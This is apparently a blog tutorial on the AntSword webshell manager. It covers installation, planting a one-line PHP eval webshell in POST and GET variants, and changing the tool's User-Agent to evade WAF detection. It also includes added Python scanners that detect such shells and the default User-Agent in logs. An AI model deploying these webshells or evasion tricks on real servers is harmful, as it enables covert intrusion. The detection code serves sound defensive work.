AntSword – a Security Tool for Post Exploitation


AntSword is a very easy-to-use post-exploitation tool for pentesters and security groups; it can also be used by webmasters. Do not use this tool on unauthorized servers/environments or for illegal purposes. It can be a better alternative to Weevely.

Description from Official website

AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters.
 
Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.

1 Installation

1.1 Download correct file/zip file

The AntSword-Loader (the launcher) can be downloaded here: https://github.com/AntSwordProject/AntSword-Loader

It can be used on Microsoft Windows, Linux and macOS platforms.

Windows AntSword

1.2 Install or unzip content

Here, we unzip to “C:\Users\win10\Desktop\as-4.0.3”

Unzip AntSword

1.3 Launch “AntSword.exe”

AntSword::Loader

1.4 Click on “Initialize” button

1.5 Select a working directory

In this example, we create a working directory named “working-dir” under the main directory: “C:\Users\win10\Desktop\as-4.0.3\working-dir”

Select the folder, then click on the “Select folder” button.

It will start to download the necessary package (which is “antSword-master.zip”).

(You might encounter the following error)

Unzip Error Code: [object Object]

If you encounter this error, follow 1.5.1.

1.5.1 Fix the error

Open the working directory we have just selected. A folder named “antSword-master” and a zip file named “antSword-master.zip” may appear there; delete them.

1.5.2 Try to launch the AntSword-Loader with Admin rights, then repeat Step 1.3 to Step 1.5 again.

We should be able to see the following screen:

download successful Extracting file...

When it’s done:

Set up successful Please manually restart later!

Then this window will disappear and the program will terminate by itself.

1.6 Now we can launch “AntSword.exe” again; it is now ready to be used

2 Simple usage Demonstration

First, we need to deploy a webshell, sometimes also called a backdoor or Trojan.

In this example we are going to use PHP.

2.1 Create a PHP file “test.php”

2.2 Save the following content to the “test.php” file

<?php eval($_POST['mytestshell']); ?>

2.3 Upload to your own testing server (Please do not test on production server or any server which does not belong to you)

2.4 Right click on blank space, click on “Add”

2.5 Enter correct server details

Shell url: Your test.php path

Shell pwd: The shell password, which is the key inside $_POST, “mytestshell” in this case

Shell type: PHP

2.6 Click on “Add” button

Add Shell

2.7 Now it will appear under “Shell Lists”

Shell Lists

2.8 Double click on the item; we can now see all files on the server (as long as the user running the server process has the corresponding privileges)

View folders, files on the server

We can even upload and download files to/from the selected folder, create, modify and delete files and folders, and even open a Terminal.

AntSword connected to WebShell

3 Other

It also supports other Shell types besides PHP.

Add shell - Shell type

Send customized HTTP Header/Body value

Add shell - HTTP Header, Body

Other settings

Add shell - Other

Proxy, Plugin Store, Encoder etc.

AntSword

AntSword official documentation: https://doc.u0u.us/en/getting_started/first_shell.html

Bonus 1 – Use AntSword with a PHP GET request

Wondering how to use AntSword with $_GET rather than $_POST in PHP?

Here is how.

The PHP file

Rather than

<?php eval($_POST['mytestshell']); ?>

We use

<?php eval($_GET['mytestshell']); ?>

The Settings in AntSword

Shell url: http://xxxxxxxxxx.com/test.php?mytestshell=eval($_POST['mypswd']);

Shell pwd: mypswd
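
From the defender's side, the one-line shells shown in 2.2 and in Bonus 1 are easy to find on disk. The following Python sketch is an added example, not part of the original post or of AntSword; it walks a web root and flags eval/assert calls fed directly from a request superglobal. The sample web root, the extension list and the function names are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Matches eval/assert sinks fed directly from a request superglobal,
# e.g. eval($_POST['x']) or eval( $_GET["x"] ). Heuristic, not a PHP parser.
SINK_RE = re.compile(
    r"\b(eval|assert)\s*\(\s*@?\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[\s*['\"]([^'\"]+)['\"]\s*\]",
    re.IGNORECASE,
)
# Assumed list of extensions the server would execute as PHP.
PHP_EXTS = {".php", ".phtml", ".php5", ".inc"}

def scan_webroot(root):
    """Return (relative path, line number, sink, superglobal, key) findings."""
    findings = []
    root = Path(root)
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in PHP_EXTS:
            continue
        text = path.read_text(errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            for m in SINK_RE.finditer(line):
                findings.append((str(path.relative_to(root)), lineno,
                                 m.group(1).lower(), m.group(2).upper(), m.group(3)))
    return findings

def demo():
    """Build a constructed sample web root and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (root / "test.php").write_text("<?php eval($_POST['mytestshell']); ?>\n")
        (root / "uploads").mkdir()
        (root / "uploads" / "img.php").write_text(
            "<?php\n  eval( $_GET[\"mytestshell\"] );\n?>\n")
        return scan_webroot(root)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

A hit is a lead for review rather than proof, and an encoded or obfuscated shell will not match this pattern, so pair it with file-integrity monitoring of the web root.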

Bonus 2 – Modify User-Agents

By default, AntSword uses “antSword/v2.1” or “antSword/v2.0” as the User-Agent when updating the webshell information or connecting to the webshell, which can be recognized easily by a WAF or a human.

To change the User-Agent for AntSword, there are 2 files and 3 places we need to modify.

b2.1.1 File 1 is “request.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\request.js”

Note: “working-dir” was created during Step 1.5

b2.1.2 Open “request.js” in Notepad or any text editor and search for “USER_AGENT”

b2.1.3 Change “antSword/v2.1” to whatever you like, then save the file

b2.2.1 File 2 is “update.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\update.js”

b2.2.2 Open “update.js” in Notepad or any text editor and search for “User-Agent”

b2.2.3 Change “antSword/v2.0” to whatever you like, then save the file
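
The default User-Agent described above, and the Bonus 1 URL that carries PHP code in its query string, both leave traces in the web server access log. The following Python example is added here (it is not from the original post or the AntSword project) and tags Combined Log Format lines on those two signals; the sample lines use constructed values and documentation IP ranges, and the tag names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Default client strings named on this page: antSword/v2.1 and antSword/v2.0.
DEFAULT_UA_RE = re.compile(r"^antSword/v\d", re.IGNORECASE)
# PHP code fragments that have no business in a query string.
CODE_IN_QUERY_RE = re.compile(
    r"\b(eval|assert)\s*\(|\$_(POST|GET|REQUEST)\s*\[", re.IGNORECASE
)

def classify(line):
    """Return the set of detection tags for one access-log line (empty = clean)."""
    m = LOG_RE.match(line)
    if not m:
        return {"unparsed"}
    tags = set()
    if DEFAULT_UA_RE.search(m["ua"]):
        tags.add("default-antsword-ua")
    # Decode percent-encoding first so encoded payloads are matched too.
    query = unquote_plus(m["target"].partition("?")[2])
    if CODE_IN_QUERY_RE.search(query):
        tags.add("php-code-in-query")
    return tags

def scan(lines):
    """Return [(line number, sorted tags)] for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        tags = classify(line)
        if tags:
            hits.append((n, sorted(tags)))
    return hits

BROWSER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36")
# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    f'192.0.2.10 - - [10/Mar/2020:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "{BROWSER_UA}"',
    '198.51.100.7 - - [10/Mar/2020:10:00:05 +0000] "POST /test.php HTTP/1.1" 200 1024 "-" "antSword/v2.1"',
    f'198.51.100.7 - - [10/Mar/2020:10:01:12 +0000] "POST /test.php?mytestshell=eval(%24_POST%5B%27mypswd%27%5D)%3B HTTP/1.1" 200 88 "-" "{BROWSER_UA}"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The User-Agent tag only catches an unmodified client, so treat the query-string tag and file-level scanning as the more durable signals.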

Bonus 3 – Latest User-Agents

Chrome

on Windows

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Linux

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Android

Mozilla/5.0 (Linux; Android 8.0.0;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/80.0.3987.95 Mobile/15E148 Safari/605.1

Firefox

on Windows

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/74.0

on Linux

Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/74.0

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/74.0

on Android

Mozilla/5.0 (Android 8.0.0; Mobile; rv:61.0) Gecko/61.0 Firefox/68.0

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/23.0 Mobile/16B92 Safari/605.1.15

IE 11/Internet Explorer 11 on Windows 10

Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko

Edge on Windows 10

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.62

YandexBot

Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)


There are many more features we can utilize, including encoding/decoding (which is very helpful when trying to evade a Web Application Firewall (WAF)), plugins, Multipart payload etc.

Warning: Do not use or test this tool on unauthorised servers.

